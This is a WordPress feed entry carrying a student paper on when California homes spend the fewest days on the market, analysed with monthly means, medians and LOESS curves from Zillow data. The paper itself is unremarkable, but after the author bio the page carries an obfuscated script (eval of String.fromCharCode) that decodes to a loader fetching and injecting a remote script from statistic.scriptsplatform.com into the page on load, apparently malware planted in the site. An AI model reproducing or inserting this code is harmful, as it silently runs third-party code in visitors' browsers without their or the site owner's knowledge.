<div class="date">
August, 2020
</div>
<p>The post <a href="https://exploratiojournal.com/analysis-of-the-duration-of-california-real-estate-on-the-market/">Analysis of the Duration of California Real Estate on the Market</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="896" height="896" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/renee.jpg" alt="" class="wp-image-352" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/renee.jpg 896w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-830x830.jpg 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/renee-480x480.jpg 480w" sizes="(max-width: 896px) 100vw, 896px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Renee Wu</strong><br><em>Shanghai American School </em><br>August, 2020</p>
</div></div>



<hr class="wp-block-separator"/>



<h2 class="wp-block-heading"><strong>Abstract</strong></h2>



<p>In investment, timing of buying and selling is crucial to profits. In the real estate community, there is often debate amongst investors on the perfect timing to sell real estate. While many contend that the perfect timing is during the summer or spring, there has been little statistical support of these theories. The purpose of this paper is to locate the optimal time for real estate sales in California based on length of time on the market. In this paper, multiple graph types are used in order to determine a concrete pattern that can be used as a basis for future real estate sales. Cyclical functions are used for the majority of the paper as they are a commonly used as a tool to analyze monthly variances. These functions are based on a twelve month scale and vary in percent change of average days of California property on the market. This way, the analysis can emphasize more on the individual changes from month to month rather than year to year. This means that the data compiled across multiple years is analyzed at the same time for each month. To analyze this data, a mean, median, or even a LOESS curve can be utilized to find the trend of the average length real estate is on the market. The mean refers to the value of all variables divided by the number of variables, whereas the median refers to the value that separates the upper half of the data from the lower half. In a LOESS curve, the points are sectioned off into different groups. Within these groups, points are calculated using a focal point, and are determined based on the points closest to the focal point. The closer the point to the focal point, the larger the weight. This is done for every point in the model until the LOESS curve is complete. This can make the model less influenced by one or more outliers. Through the use of these methods, the optimal time for selling real estate based on average days on the market can be found.</p>



<h2 class="wp-block-heading"><strong>Overall Changes:</strong></h2>



<p>To look at the optimal sale time in California, aggregated real estate data was pulled from Zillow ranging all the way from January of 2010 to December of 2019 (“California Home Prices”). As can be seen through the following charts, the average days of real estate on the California market has seemed to drop over the course of ten years from almost 100 days on the market to slightly above 50.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="628" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure1-1024x628.png" alt="" class="wp-image-354" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1024x628.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-300x184.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-768x471.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-830x509.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-230x141.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-350x215.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-480x295.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1.png 1356w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong>Figure 1: </strong>Average Days on Market for Californian Real Estate 2010-2020</figcaption></figure>



<p>This change could have been caused by a variety of factors, including the Great Recession from the end of 2007 until 2009. While the data only tracks the changes starting from 2010, the effects are still great enough to be seen. The Great Recession was caused by the housing market booming then busting when financial institutions over-lended and over-marketed mortgage backed securities at exorbitant levels to sometimes unqualified borrowers (Hall). After the recession, consumers were then hesitant to invest in the very market that had caused the crash. The high levels of days in which real estate was on the market demonstrates the tentative investors. However, as can be seen from 2012 onwards, the days on the market fell as people slowly gained confidence in real estate, with the days on the market generally stabilizing from 2013 to 2017, followed by an even further decrease.</p>



<p>When looking at initial data displayed in Figure 1, one can almost instantly recognize the cyclical form taking place from 2013 to the end of 2019. This initial instinct led to the creation of a graph depicting the percent change from one month to the next over the course of these ten years. From this chart, my initial theory was confirmed and it can be seen that the average days on market of real estate indeed has a cyclical pattern.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="697" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure2-1024x697.png" alt="" class="wp-image-355" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1024x697.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-300x204.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-768x523.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-830x565.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-230x157.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-350x238.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-480x327.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2.png 1160w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong>Figure 2</strong></figcaption></figure>



<h2 class="wp-block-heading"><strong>Monthly Basis:</strong></h2>



<p>After the assurance of a repetitive, reliable pattern from year to year, the next step was finding a way to demonstrate the differences in monthly averages of length of California real estate on the market. To do this, the x-axis was set to a month by month basis (Figure 3). Each year is represented by a scale of colors, with the oldest data from 2010 being the darker blue, and the most recent from 2019 being lighter blue. This way, the data would emphasize each month and the differences between those months.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="734" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure3-1024x734.png" alt="" class="wp-image-356" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1024x734.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-300x215.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-768x550.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-830x595.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-230x165.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-350x251.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-480x344.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3.png 1072w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong>Figure 3</strong>: Percent Change of Average Days on Market for the Californian Real Estate on a Monthly Basis</figcaption></figure>



<p>There were no significant outliers from year to year. For example, the darkest blue colors did not show that the percent change in days on the market to stay the same from January to February, rather, for almost all years, as can be seen through the tight clusters, there seemed to be specific months where the percent change would be similar, whether it be 2010 or 2019. The month of December demonstrates this. From 2010 to 2019, the month of December has stayed between zero to a little above 0.1 percent change in average days of real estate on the California market.</p>



<p>The data points were usually in close clusters, which caused the mean and median to be relatively similar and consistent throughout the twelve months. In Figure 4, the red line represents the median percent change of each month in average days on the market for California real estate while the blue represents the mean of the percent change of each month. The average standard deviation of the points from each month is 0.0375. Some months varied more than others; months such as March had relatively larger standard deviations of 0.083, while months like June had smaller deviations of only 0.015. Overall, the standard deviation is still quite minimal. The green line depicted below demonstrates the mean of the percent change from year to year, which is-0.00034%. When the mean and median (red and blue) are so closely related, it can be said that the data has minimal outliers and that both the mean and median are accurate measures of this set of data points.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="621" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure4-1024x621.png" alt="" class="wp-image-357" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-1024x621.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-300x182.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-768x466.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-830x503.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-230x139.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-350x212.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4-480x291.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure4.png 1250w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong>Figure 4: </strong>Percent Change of Average Days on Market for Californian Real Estate on a Monthly Basis with Mean and Median</figcaption></figure>



<p>Both the mean and median in Figure 4 display the lowest point to be in March, followed by a sharp increase in April and a more gradual incline through to January, where it once again drops dramatically. This has high implications in that it could potentially mean that the month with the shortest days on the market for real estate is March. The high increase from November to January is likely due to low demand during holiday season as most are busy with familial obligations (Fuscaldo). On the other hand, the dip in April and March is most likely caused by the high demand as families start to search for a home before the school year begins (Thorsby).</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="671" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure5-1024x671.png" alt="" class="wp-image-358" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-1024x671.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-300x196.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-768x503.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-830x544.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-350x229.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5-480x314.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure5.png 1078w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong>Figure 5: </strong>Percent Change of Average Days on Market for Californian Real Estate on a Monthly Basis with LOESS Model</figcaption></figure>



<p>Figure 5 denotes a similar chart to Figure 3 and 4, except instead of a mean or median, it uses a LOESS residuals curve to find the curve for average days on the market for Californian real estate. In Figure 5, the blue line demonstrates the LOESS curve which is based on the weight of local points, while the gray area following the blue line represents the confidence band. The confidence band is the uncertainty in a curve based on limited data. As can be seen in the chart below, the confidence band is fairly thin, meaning that the difference between the highest and lowest points are significant.</p>



<p>As can be seen in Figure 5, the LOESS curve conveys similar, but not exactly the same information. It still shows that November through January have the longest durations for average days on the market, as well as significant drop in the spring. However, recall that in Figure 4 both the mean and medians displayed March to be the lowest point, but according to the LOESS model it seems that April is the lowest point. The real life theory is still supportive of why consumers have higher demand for housing, yet what is causing the numerical differences? This all leads back to the way LOESS curves are constructed. A LOESS model can be more accurate than the mean or median because it is more influenced by the local points near the focal point, whereas the mean and median can shift quite easily due to a couple of low values, such as in Figure 3 where March is quite low compared to Figure 4. As mentioned earlier, March’s standard deviation is larger compared to the other months, which could be the reason the LOESS curve was only different from the mean and median in this month and not the others.</p>



<h2 class="wp-block-heading">Conclusion:</h2>



<p>Although there are a few minor differences between the median/mean and the LOESS model, the general shape of the curve still suggests that the lowest point is in the spring from March to April. This means that the lowest average days California real estate is on the market is during those months. The decrease could be caused by a rise in demand due to increased pressure to purchase in anticipation of a new job after the summer or new school. The worst time for real estate sales in regard to length of time on market is typically in the winter, where families and individuals are busier with the holidays and are more reluctant to see open houses.</p>



<p class="no_indent">Mentor: Dr. Peter Kempthorne,
<i>Massachusetts Institute of Technology</i></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/renee.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150"/>
<h5>Renee Wu</h5>
<p class="no_indent" style="margin:0;">Renee Wu is a rising Senior who has a passion for economics, real estate, and investment. She is from California, but currently resides in Shanghai, China. In her free time, she loves to fence or relax with a movie and some caramel popcorn.</p></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/analysis-of-the-duration-of-california-real-estate-on-the-market/">Analysis of the Duration of California Real Estate on the Market</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
